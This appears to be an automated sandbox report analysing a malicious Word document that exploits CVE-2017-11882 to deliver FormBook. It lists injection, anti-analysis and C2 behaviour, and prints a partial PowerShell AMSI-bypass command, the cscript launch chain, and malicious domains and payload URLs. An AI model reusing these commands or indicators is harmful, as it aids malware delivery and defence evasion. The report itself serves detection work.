          Source: C:\Windows\SysWOW64\cscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32
          Source: C:\Windows\SysWOW64\cscript.exe WMI Queries: IWbemServices::ExecMethod - Win32_Process::CrEaTe
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRDDA1.tmp
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 13_2_00B8719A CoCreateInstance,GetStdHandle,13_2_00B8719A
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
          Source: Window Recorder Window detected: More than 3 window changes detected
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: RFQ-CIF DT22.doc Static file information: File size 2186640 > 1048576
          Source: Binary string: wntdll.pdb source: calc.exe, calc.exe, 0000000B.00000003.488729930.00000000007C0000.00000004.00000001.sdmp, calc.exe, 0000000B.00000002.542590602.0000000000CB0000.00000040.00000001.sdmp, calc.exe, 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, calc.exe, 0000000B.00000003.487607468.0000000000660000.00000004.00000001.sdmp, cscript.exe
          Source: Binary string: cscript.pdbN source: calc.exe, 0000000B.00000002.541582055.0000000000584000.00000004.00000020.sdmp, calc.exe, 0000000B.00000002.541504670.0000000000430000.00000040.00020000.sdmp
          Source: Binary string: cscript.pdb source: calc.exe, 0000000B.00000002.541582055.0000000000584000.00000004.00000020.sdmp, calc.exe, 0000000B.00000002.541504670.0000000000430000.00000040.00020000.sdmp, cscript.exe
          Source: ~WRF{2A5D8C87-AF4E-46DF-A13D-D1E92A25FFAE}.tmp.0.dr Initial sample: OLE indicators vbamacros = False

          Data Obfuscation:

          Source: C:\Windows\SysWOW64\calc.exe Code function: 11_2_0041E99D push fs; ret 11_2_0041E99F
          Source: C:\Windows\SysWOW64\calc.exe Code function: 11_2_00416BC6 push esp; iretd 11_2_00416BDB
          Source: C:\Windows\SysWOW64\calc.exe Code function: 11_2_0041EB8A push dword ptr [AD487281h]; ret 11_2_0041EE6B
          Source: C:\Windows\SysWOW64\calc.exe Code function: 11_2_0041D4B5 push eax; ret 11_2_0041D508
          Source: C:\Windows\SysWOW64\calc.exe Code function: 11_2_0041D56C push eax; ret 11_2_0041D572
          Source: C:\Windows\SysWOW64\calc.exe Code function: 11_2_0041D502 push eax; ret 11_2_0041D508
          Source: C:\Windows\SysWOW64\calc.exe Code function: 11_2_0041D50B push eax; ret 11_2_0041D572
          Source: C:\Windows\SysWOW64\calc.exe Code function: 11_2_0041BE96 push ss; retf 11_2_0041BE99
          Source: C:\Windows\SysWOW64\calc.exe Code function: 11_2_00417740 push FFFFFFDAh; ret 11_2_00417742
          Source: C:\Windows\SysWOW64\calc.exe Code function: 11_2_0041EFC8 push esp; ret 11_2_0041F011
          Source: C:\Windows\SysWOW64\calc.exe Code function: 11_2_00B4DFA1 push ecx; ret 11_2_00B4DFB4
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 13_2_00B8262B push ecx; ret 13_2_00B8263E
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 13_2_022DDFA1 push ecx; ret 13_2_022DDFB4
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 13_2_0008E99D push fs; ret 13_2_0008E99F
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 13_2_0008EB8A push dword ptr [AD487281h]; ret 13_2_0008EE6B
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 13_2_00086BC6 push esp; iretd 13_2_00086BDB
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 13_2_0008DC2C push ecx; ret 13_2_0008DC2D
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 13_2_0008D4B5 push eax; ret 13_2_0008D508
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 13_2_0008D50B push eax; ret 13_2_0008D572
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 13_2_0008D502 push eax; ret 13_2_0008D508
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 13_2_0008D56C push eax; ret 13_2_0008D572
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 13_2_0008BE96 push ss; retf 13_2_0008BE99
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 13_2_00087740 push FFFFFFDAh; ret 13_2_00087742
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 13_2_0008EFC8 push esp; ret 13_2_0008F011
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 13_2_00B86E5C LoadLibraryA,GetProcAddress,GetLastError,13_2_00B86E5C

          Persistence and Installation Behavior:

          Creates processes via WMI
          Source: C:\Windows\SysWOW64\cscript.exe WMI Queries: IWbemServices::ExecMethod - Win32_Process::CrEaTe

          Hooking and other Techniques for Hiding and Protection:

          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exe User mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x85 0x5E 0xEB
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cscript.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cscript.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Windows\SysWOW64\calc.exe RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\calc.exe RDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cscript.exe RDTSC instruction interceptor: First address: 0000000000079904 second address: 000000000007990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cscript.exe RDTSC instruction interceptor: First address: 0000000000079B7E second address: 0000000000079B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2680 Thread sleep time: -60000s >= -30000s
          Source: C:\Windows\SysWOW64\cscript.exe TID: 800 Thread sleep time: -180000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2808 Thread sleep time: -60000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2308 Thread sleep time: -60000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3016 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\cscript.exe Last function: Thread delayed
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\calc.exe Code function: 11_2_00409AB0 rdtsc 11_2_00409AB0
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
          Source: explorer.exe, 0000000C.00000000.493099167.000000000457A000.00000004.00000001.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: explorer.exe, 0000000C.00000000.496910219.0000000000255000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000C.00000000.509247877.00000000044E7000.00000004.00000001.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: explorer.exe, 0000000C.00000000.493099167.000000000457A000.00000004.00000001.sdmp Binary or memory string: pciide\idechannel\5&12368b4a&0&7ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0acpi\pnp0a05\5cacpi\pnp0a05\25pciide\idech7
          Source: explorer.exe, 0000000C.00000000.490369048.000000000029B000.00000004.00000020.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
          Source: explorer.exe, 0000000C.00000000.493209706.00000000045D6000.00000004.00000001.sdmp Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 13_2_00B8F0D3 GetFileAttributesW,GetLastError,FindFirstFileW,WideCharToMultiByte,WideCharToMultiByte,GetLastError,WideCharToMultiByte,GetFileAttributesA,GetLastError,FindFirstFileA,FindClose, 13_2_00B8F0D3
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 13_2_00B86E5C LoadLibraryA,GetProcAddress,GetLastError, 13_2_00B86E5C
          Source: C:\Windows\SysWOW64\calc.exe Code function: 11_2_00B526F8 mov eax, dword ptr fs:[00000030h] 11_2_00B526F8
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 13_2_022C0080 mov ecx, dword ptr fs:[00000030h] 13_2_022C0080
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 13_2_022C00EA mov eax, dword ptr fs:[00000030h] 13_2_022C00EA
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 13_2_022E26F8 mov eax, dword ptr fs:[00000030h] 13_2_022E26F8
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process queried: DebugPort
          Source: C:\Windows\SysWOW64\calc.exe Process queried: DebugPort
          Source: C:\Windows\SysWOW64\cscript.exe Process queried: DebugPort
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 13_2_00B818C4 GetProcessHeap,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree, 13_2_00B818C4
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\calc.exe Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\cscript.exe Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\calc.exe Code function: 11_2_0040ACF0 LdrLoadDll, 11_2_0040ACF0
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 13_2_00B81335 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 13_2_00B81335

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe Network Connect: 47.241.96.113 80
          Source: C:\Windows\explorer.exe Domain query: www.foodcartgps.net
          Source: C:\Windows\explorer.exe Domain query: www.milan-sites.com
          Maps a DLL or memory area into another process
          Source: C:\Windows\SysWOW64\calc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\calc.exe Section loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cscript.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\cscript.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Injects a PE file into a foreign processes
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\calc.exe base: 400000 value starts with: 4D5A
          Sample uses process hollowing technique
          Source: C:\Windows\SysWOW64\calc.exe Section unmapped: C:\Windows\SysWOW64\cscript.exe base address: B80000
          Writes to foreign memory regions
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\calc.exe base: 400000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\calc.exe base: 401000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\calc.exe base: 7EFDE008
          Queues an APC in another process (thread injection)
          Source: C:\Windows\SysWOW64\calc.exe Thread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Windows\SysWOW64\calc.exe Thread register set: target process: 1764
          Source: C:\Windows\SysWOW64\cscript.exe Thread register set: target process: 1764
          Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like '*iUtils') {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like '*Context') {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1); ...
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Windows\SysWOW64\cmd.exe CmD.exe /C cscript %tmp%\Client.vbs A C
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cscript.exe cscript C:\Users\user\AppData\Local\Temp\Client.vbs A C
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\calc.exe {path}
          Source: C:\Windows\SysWOW64\cscript.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\WINDOWS\syswow64\calc.exe"
          Source: explorer.exe, 0000000C.00000000.505250749.0000000000750000.00000002.00020000.sdmp, explorer.exe, 0000000C.00000000.528027687.0000000000750000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 0000000C.00000000.527766605.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000C.00000000.496910219.0000000000255000.00000004.00000020.sdmp Binary or memory string: ProgmanG
          Source: explorer.exe, 0000000C.00000000.505250749.0000000000750000.00000002.00020000.sdmp, explorer.exe, 0000000C.00000000.528027687.0000000000750000.00000002.00020000.sdmp Binary or memory string: !Progman
          Source: explorer.exe, 0000000C.00000000.505250749.0000000000750000.00000002.00020000.sdmp, explorer.exe, 0000000C.00000000.528027687.0000000000750000.00000002.00020000.sdmp Binary or memory string: Program Manager<
          Source: C:\Windows\SysWOW64\cscript.exe Code function: GetUserDefaultLCID,GetLocaleInfoA,LoadStringA,GetModuleFileNameA,LoadLibraryExA,LoadLibraryExA,LoadLibraryExA,lstrlenA,___swprintf_l,LoadLibraryExA,LoadLibraryExA,GetUserDefaultLCID,GetLocaleInfoA,___swprintf_l,LoadLibraryExA,LoadLibraryExA, 13_2_00B83030
          Source: C:\Windows\SysWOW64\cscript.exe Code function: GetLocaleInfoW,wcsncmp, 13_2_00B941BC
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation
          Source: C:\Windows\SysWOW64\cscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 13_2_00B82FA1 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 13_2_00B82FA1
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 13_2_00B8386A RegCloseKey,SysFreeString,RegCloseKey,RegCloseKey,RegCloseKey,RegisterEventSourceW,GetUserNameW,LookupAccountNameW,LookupAccountNameW,??2@YAPAXI@Z,??2@YAPAXI@Z,LookupAccountNameW,??3@YAXPAX@Z,ReportEventW,DeregisterEventSource,??3@YAXPAX@Z,??3@YAXPAX@Z, 13_2_00B8386A
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 13_2_00B8587A GetVersionExA, 13_2_00B8587A

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match File source: 11.0.calc.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara match File source: 11.0.calc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 11.2.calc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 11.0.calc.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 11.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 0000000D.00000002.687433526.0000000000650000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match File source: 0000000D.00000002.687211832.0000000000070000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match File source: 0000000B.00000002.541309604.0000000000140000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match File source: 0000000B.00000002.541440559.0000000000380000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match File source: 0000000B.00000002.541476274.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 0000000B.00000000.486962418.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 0000000C.00000000.504387143.00000000099E9000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match File source: 0000000B.00000000.487337490.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 0000000D.00000002.687509430.0000000000680000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 0000000C.00000000.514319622.00000000099E9000.00000040.00020000.sdmp, type: MEMORY

          Remote Access Functionality:

          Yara detected FormBookShow sources
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 13_2_00B9041E CreateBindCtx, SysAllocStringByteLen, SysFreeString
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 13_2_00B91AA2 CreateBindCtx, MkParseDisplayName
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 13_2_00B866C1 CoCreateInstance, CoCreateInstance, CoCreateInstance, GetUserDefaultLCID, CoGetClassObject, CreateBindCtx

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Windows Management Instrumentation 11 | DLL Side-Loading 1 | DLL Side-Loading 1 | Deobfuscate/Decode Files or Information 1 | Credential API Hooking 1 | System Time Discovery 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Scripting 1 | Boot or Logon Initialization Scripts | Process Injection 712 | Scripting 1 | LSASS Memory | Account Discovery 1 | Remote Desktop Protocol | Credential API Hooking 1 | Exfiltration Over Bluetooth | Encrypted Channel 11 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | Native API 1 | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information 3 | Security Account Manager | File and Directory Discovery 3 | SMB/Windows Admin Shares | Clipboard Data 1 | Automated Exfiltration | Non-Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | Shared Modules 1 | Logon Script (Mac) | Logon Script (Mac) | Software Packing 1 | NTDS | System Information Discovery 126 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 113 | SIM Card Swap | | Carrier Billing Fraud
          Cloud Accounts | Exploitation for Client Execution 33 | Network Logon Script | Network Logon Script | DLL Side-Loading 1 | LSA Secrets | Query Registry 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Command and Scripting Interpreter 111 | Rc.common | Rc.common | Rootkit 1 | Cached Domain Credentials | Security Software Discovery 131 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Masquerading 1 | DCSync | Process Discovery 2 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Modify Registry 1 | Proc Filesystem | Virtualization/Sandbox Evasion 31 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
          Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Virtualization/Sandbox Evasion 31 | /etc/passwd and /etc/shadow | System Owner/User Discovery 1 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction
          Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Process Injection 712 | Network Sniffing | Remote System Discovery 1 | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | | | Data Encrypted for Impact

          Behavior Graph

          [Figure: behavior graph. Behavior Graph ID: 532827, Sample: RFQ-CIF DT22.doc, Startdate: 02/12/2021, Architecture: WINDOWS, Score: 100]

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          RFQ-CIF DT22.doc | 25% | Virustotal |
          RFQ-CIF DT22.doc | 16% | ReversingLabs | Document-RTF.Trojan.Alien

          Dropped Files

          Source | Detection | Scanner | Label
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{2A5D8C87-AF4E-46DF-A13D-D1E92A25FFAE}.tmp | 100% | Avira | EXP/CVE-2017-11882.Gen

          Unpacked PE Files

          Source | Detection | Scanner | Label
          11.0.calc.exe.400000.2.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          11.0.calc.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          11.2.calc.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          11.0.calc.exe.400000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          No Antivirus matches

          URLs

          Source | Detection | Scanner | Label
          http://wellformedweb.org/CommentAPI/ | 0% | URL Reputation | safe
          http://schemas.openformatrg/package/2006/content-t | 0% | URL Reputation | safe
          http://www.iis.fhg.de/audioPA | 0% | URL Reputation | safe
          http://www.milan-sites.com/t1st/?axoXKTD=uTpqzRmP4oAoFu5bW/C1NBvei3ZEHQ9lndq23HdAXkDs/tJRE4xymzeaNit+87gYgYiprQ==&bx=7nL09FJ | 0% | Avira URL Cloud | safe
          http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe
          http://treyresearch.net | 0% | URL Reputation | safe
          http://schemas.open | 0% | URL Reputation | safe
          http://java.sun.com | 0% | URL Reputation | safe
          http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe
          www.cybocross.com/t1st/ | 3% | Virustotal |
          www.cybocross.com/t1st/ | 0% | Avira URL Cloud | safe
          http://computername/printers/printername/.printer | 0% | Avira URL Cloud | safe
          http://www.%s.comPA | 0% | URL Reputation | safe
          http://servername/isapibackend.dll | 0% | Avira URL Cloud | safe

          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          www.milan-sites.com | 47.241.96.113 | true | true | | unknown
          google.com | 216.58.215.238 | true | false | | high
          cdn.discordapp.com | 162.159.135.233 | true | false | | high
          www.foodcartgps.net | unknown | unknown | true | | unknown

          Contacted URLs

          Name | Malicious | Antivirus Detection | Reputation
          https://cdn.discordapp.com/attachments/915347845752705109/915799206072045578/m.jpg | false | | high
          http://www.milan-sites.com/t1st/?axoXKTD=uTpqzRmP4oAoFu5bW/C1NBvei3ZEHQ9lndq23HdAXkDs/tJRE4xymzeaNit+87gYgYiprQ==&bx=7nL09FJ | true | Avira URL Cloud: safe | unknown
          www.cybocross.com/t1st/ | true | 3%, Virustotal; Avira URL Cloud: safe | low

                    URLs from Memory and Binaries


                                                      Contacted IPs

                                                      Public

                                                      IP | Domain | Country | ASN | ASN Name | Malicious
                                                      47.241.96.113 | www.milan-sites.com | United States | 45102 | CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | true
                                                      162.159.135.233 | cdn.discordapp.com | United States | 13335 | CLOUDFLARENETUS | false

                                                      General Information

                                                      Joe Sandbox Version: 34.0.0 Boulder Opal
                                                      Analysis ID: 532827
                                                      Start date: 02.12.2021
                                                      Start time: 18:25:27
                                                      Joe Sandbox Product: CloudBasic
                                                      Overall analysis duration: 0h 10m 55s
                                                      Hypervisor based Inspection enabled: false
                                                      Report type: full
                                                      Sample file name: RFQ-CIF DT22.doc
                                                      Cookbook file name: defaultwindowsofficecookbook.jbs
                                                      Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                      Number of analysed new started processes analysed: 17
                                                      Number of new started drivers analysed: 0
                                                      Number of existing processes analysed: 0
                                                      Number of existing drivers analysed: 0
                                                      Number of injected processes analysed: 1
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • HDC enabled
                                                      • AMSI enabled
                                                      Analysis Mode: default
                                                      Analysis stop reason: Timeout
                                                      Detection: MAL
                                                      Classification: mal100.troj.expl.evad.winDOC@12/12@5/2
                                                      EGA Information: Failed
                                                      HDC Information:
                                                      • Successful, ratio: 23.6% (good quality ratio 22.2%)
                                                      • Quality average: 70.2%
                                                      • Quality standard deviation: 29.8%
                                                      HCA Information:
                                                      • Successful, ratio: 100%
                                                      • Number of executed functions: 70
                                                      • Number of non-executed functions: 183
                                                      Cookbook Comments:
                                                      • Adjust boot time
                                                      • Enable AMSI
                                                      • Found application associated with file extension: .doc
                                                      • Found Word or Excel or PowerPoint or XPS Viewer
                                                      • Attach to Office via COM
                                                      • Scroll down
                                                      • Close Viewer
                                                      Warnings:
                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                                      • Not all processes were analyzed, report is missing behavior information
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                      • Report size getting too big, too many NtSetInformationFile calls found.

                                                      Simulations

                                                      Behavior and APIs

                                                      Time | Type | Description
                                                      18:25:20 | API Interceptor | 27x Sleep call for process: EQNEDT32.EXE modified
